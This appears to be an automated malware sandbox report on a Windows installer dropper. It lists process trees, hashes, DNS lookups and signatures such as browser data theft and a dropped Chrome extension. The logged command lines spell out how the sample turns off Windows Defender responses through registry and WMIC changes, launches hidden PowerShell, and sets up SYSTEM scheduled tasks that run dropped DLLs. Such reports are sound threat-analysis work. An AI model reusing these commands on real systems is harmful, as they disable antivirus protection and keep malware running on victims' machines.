"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bcicWGWSPuqTxjDSpV"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\prAQyJMeU\XkLWlf.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rbzCIowvsKWRrhO" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "rbzCIowvsKWRrhO2" /F /xml "C:\Program Files (x86)\prAQyJMeU\ixxtvyh.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "rbzCIowvsKWRrhO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "rbzCIowvsKWRrhO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yZMZGSbxnbvyuO" /F /xml "C:\Program Files (x86)\zNBDoCPwUgCU2\HAWbSXq.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "IeZcDvoJstcUS2" /F /xml "C:\ProgramData\wpmocubwzvTKZWVB\akjgehV.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "XgRdArvYBmOriRaMM2" /F /xml "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\rgNvluu.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "pKGBoMxbXyYHoUCPnwv2" /F /xml "C:\Program Files (x86)\hkBthRLftwjEC\XQOcubk.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "EXxaHtUqjXkXqVrbU" /SC once /ST 02:38:22 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HKomOEKiubDeyUja\hlZgmkcB\DCRjpFS.dll\",#1 /RqSdidt 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "EXxaHtUqjXkXqVrbU"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HKomOEKiubDeyUja\hlZgmkcB\DCRjpFS.dll",#1 /RqSdidt 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HKomOEKiubDeyUja\hlZgmkcB\DCRjpFS.dll",#1 /RqSdidt 525403

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "emrEEeoVdUigmulhl"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 940

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "EXxaHtUqjXkXqVrbU"

Network

Country Destination Domain Proto
US 8.8.8.8:53 service-domain.xyz udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 api2.check-data.xyz udp

Files

\Users\Admin\AppData\Local\Temp\7zS167D.tmp\Install.exe

MD5 4954abb31b477d6495481b1f64853c7d
SHA1 a2687a4e496f8550d9cbbd94aca9b50300dccc1c
SHA256 88ad0a455dd1361c35d39dc017fc716cbfc9fa14ed4b3f33ed1f23963ee81290
SHA512 e58ef708ca63ec3a9a3798935e3d5451f74bda1d47aa3960115a02616ab9904a03bad4d3ecde54b537963c328daaa09107a858f5ae50c71ffaedc6bd03be1529

\Users\Admin\AppData\Local\Temp\7zS18DE.tmp\Install.exe

MD5 f9a08c6959d27b9edcb157f1938ff8c9
SHA1 f57fc4c0780afc65f84b3f1fddd55bdd7519c3e2
SHA256 d052b74c87dd082fa1ccc32b8441e63e433a60c69b21174ccf43f7f134a725e0
SHA512 eabdfc83451aa2523b924f670a5026438dc69ae9c0687b8bf12c9e318e0bbab34862ebc7e39221f140af67cd9622e5e4f9c7881feb7376bb9c4fd31e3b62fe33

memory/2060-24-0x0000000010000000-0x00000000105E8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 2debdd22c55d2b2c3b9c04a124304393
SHA1 a61048c05e2fbbf34267153859ab414ca3629eb9
SHA256 ec09ef6a4d12e2c0e2bf0fe8132fd39c51e7917a2108411352fe0ce042e66969
SHA512 179b1f85694eceb6fedf327a7d40dca0e310de83f7ad4d2105279c1175959871daf25f12d3c160dc4aad9a34ce620e4dc15797001d715adf1f7f3e3ccdc0b03c

memory/2472-36-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/1796-45-0x000000001B690000-0x000000001B972000-memory.dmp

memory/1796-46-0x0000000001F80000-0x0000000001F88000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1dbf2a5dc60b5c6ca43ca8fcdbc29664
SHA1 f0a58c8ed1abe78762c14ffcc046389376724073
SHA256 0df6f9bdebbafbee760a823eaaaaaca966f25957ca8bd74821c63ff6955643e3
SHA512 1c7be19ac4cba212e159f0a3bc7a29fa2554cc7f99ede75bbeafc40e57a78ec91d43dbd7f2a9be205ec4d4a9181ba52dd4310f723f314625949997aad3baa4f7

memory/1624-55-0x000000001B640000-0x000000001B922000-memory.dmp

memory/1624-56-0x0000000001F50000-0x0000000001F58000-memory.dmp

C:\Windows\Temp\HKomOEKiubDeyUja\zLhHmZnO\nrOwqQxslnUsDsUC.wsf

MD5 6a4e7257944197263323ea5cd1ccdff4
SHA1 2dd239b279b40677bee77ef816bdc03bf42b8eb8
SHA256 8a8e99a9e66570fd311d520d7f12fb792255af21631369391dc0f982ad27bdda
SHA512 fd34a4648033ca157dd5ff9c39b61bfd60c9be7863a5f9ee57d2484627051bb943472b0ec75bdd68889634e0e00e644eba9daf11835a7eccb6c4462fa7fe5c74

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 b1b5e7b2e39880765328dff3fa82ff15
SHA1 4afa90d64087b061e9fe77c8caf04e12a05889e1
SHA256 b999efa6063f9f3f18d7d3ff3f0a250e73baa68bc4369b8ef2946dca27516720
SHA512 5d6661ee1b1557d4325dbd981a69ec0ab5690dcdc667781d24f9a76021421d326df0127c47dede20319b78444b8c6c6f008623088d904d0ccdf913d7829e37d8

memory/2268-74-0x0000000010000000-0x00000000105E8000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2268-86-0x00000000023D0000-0x0000000002455000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

MD5 c87c9395796b6af0a0fea73f35ed886a
SHA1 c4b96976c8f0db27f3370097d872578f09a8ba91
SHA256 2997c478b9360ec37ca7ba6dde31523dacda2703f56535868c74c6943f0511f5
SHA512 7d34af2238869a3775a5080af0738e3f54d47f4a45dd3307e0c3e9e891724d34d066507453d9e327f565213821071b55ddafb8a4d4bec25957f4bd083d5c80de

memory/2268-119-0x0000000002110000-0x0000000002173000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 648dada68b2859efecdd9f8bd1bf0258
SHA1 d28d2dcb53c982f897ea6bf872a503eec3709cad
SHA256 7e531a097cb2de609acfd2d47e3ef92a5e9e74f0129c4b3951e9909e3054d619
SHA512 6af5a1a6dc56ae6a872038989e2e356aa68b37bf5163e23d21bd80d07194a3cbc9d78d07e410d162e3aa06bd6eff48699570fd7de834ee20bb0b0ef82e35e0fa

C:\Program Files (x86)\prAQyJMeU\ixxtvyh.xml

MD5 ecea1d8b15c12f0b997b29800524397c
SHA1 91a3ea4d99e47041cf216978f91c39a6a63ec54a
SHA256 1aa621c80b5451565a63ed7def86c446dbad5276e524260e11e638565b97a084
SHA512 9bab368e456f042c00941149c9f54bde39091c02eb5704159857ae566d9ecf93c0a20c15ea7856dd20d3c3e4b79bf6ca1893a655bf3d1a1dec47ff1bd4bfe202

C:\Program Files (x86)\zNBDoCPwUgCU2\HAWbSXq.xml

MD5 1969604e9f224fd5f44ba74867a7e78e
SHA1 aa150ecc14683249da882edd77db2ca13f493469
SHA256 4f3d7f7473d0282eb009f7c7a1748bb5d6c6f629bda7d6d63076d6fb7f155424
SHA512 e1b5f68de3e0d55afa0b3ee6ef5fce3e63bf9676de1e5914002d381472b9d8277334b3b14019a99d6eebd9516beaba635cc8ec75d3d2caeaca69157a10f3e369

C:\ProgramData\wpmocubwzvTKZWVB\akjgehV.xml

MD5 1f8bdb1e7cd83fb6803633440833a04d
SHA1 3994ccb1e8f7254b75a73a9ae9795aa9c0bb19da
SHA256 2debb801194eb0e496d73944e4d53d7ba355c83fdeb68eaf3bac2fa97cb19bff
SHA512 1ddc91fd915377d7090ca6861087ed4ed07b2789cc91a87f014f3a8c50c91716f1883f01dfa80febb00c4ee07d33b9801a2fc162c791b0b174e4d52e9fc495bd

C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\rgNvluu.xml

MD5 992b89634e85a2b103ef49d6022054a4
SHA1 4d5e64e2ff3c3b8cfd4eb9c1e190d23b064607c6
SHA256 6508db434fdb382bd9c602d1d6a7b592048c25955872d17bb03901dbf71025fb
SHA512 8e354f9e684ca28c7e26603c55af64bb57a801c9da120de87291b5732cf1c36c445925e9bf096ce506b8339463ec0e298ce1d06c87ba173d10312d55b6c6229b

C:\Program Files (x86)\hkBthRLftwjEC\XQOcubk.xml

MD5 a57dd664f3630698f32da65583847bfe
SHA1 3194dfa6095ee17f04f782e7509db5065dae1a8c
SHA256 48dc1924d2a6f2b27b07033024b7229f0aa2a3cc7f9f292f269c5f531dc51d91
SHA512 0296304c9a1fd099713711cf947d54cc82f20c12749ff53839a7fb6bf67d6fdacf292187e7c10b09ad0b1eee6feee1f0d51bbd1bfa6352a77c2d545683d50d4a

memory/2268-275-0x0000000002920000-0x00000000029A1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uu0g08su.default-release\prefs.js

MD5 427f1e24cabbc1841a2484b10bbb87ed
SHA1 8cf0040893da73b979efa90f5c71b720c5427a7b
SHA256 aa8789de098c1559d1e7460c2e70b104ef426687486facd0007d67f70666bd3c
SHA512 51d2227ea43a0e9c472b3f3bd20aa60f5267329993de69c135bd538cf71b805d318d1dba7eeb5a6f982dbd51886ac9e26723718dc819048d3e8ae19c6dd2ef3c

memory/2268-285-0x0000000003FE0000-0x00000000040C2000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c2f38b5afffe152311d8df4c6e904ad1
SHA1 4ca2a2676d4fb97f58a76c37cb254603bd2ceb97
SHA256 d0101f92c9d0a16b8bbfb20a25922970af3765cd868b4443eec4a98a0091370e
SHA512 6f094787a55c23374901add231ceb03329782f5d9047fce60bae6a80205654e85142491ae2c5e1aba278f22564d04d46151e80e185bcbb168600dd375fa3df83

\Windows\Temp\HKomOEKiubDeyUja\hlZgmkcB\DCRjpFS.dll

MD5 216eb0d2159277ee754d47ff6f6ac846
SHA1 acd01636db032de730b96f3d97262989f530da36
SHA256 d488c456e9a11710894221582b8664e12fd716e621c12bc5247dba70459c7f95
SHA512 16d34eb7bb2c1a0ee2f949cd7615dc53e59b28b1380f4b0ebbc3a6ce31804a4defeb6c00715eac93d2b733411b15f1c970aa6777753ebe488f75840765ca551d

memory/2200-313-0x00000000012B0000-0x0000000001898000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 22:54

Reported

2024-06-13 23:00

Platform

win10-20240404-en

Max time kernel

163s

Max time network

299s

Command Line

"C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6189.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
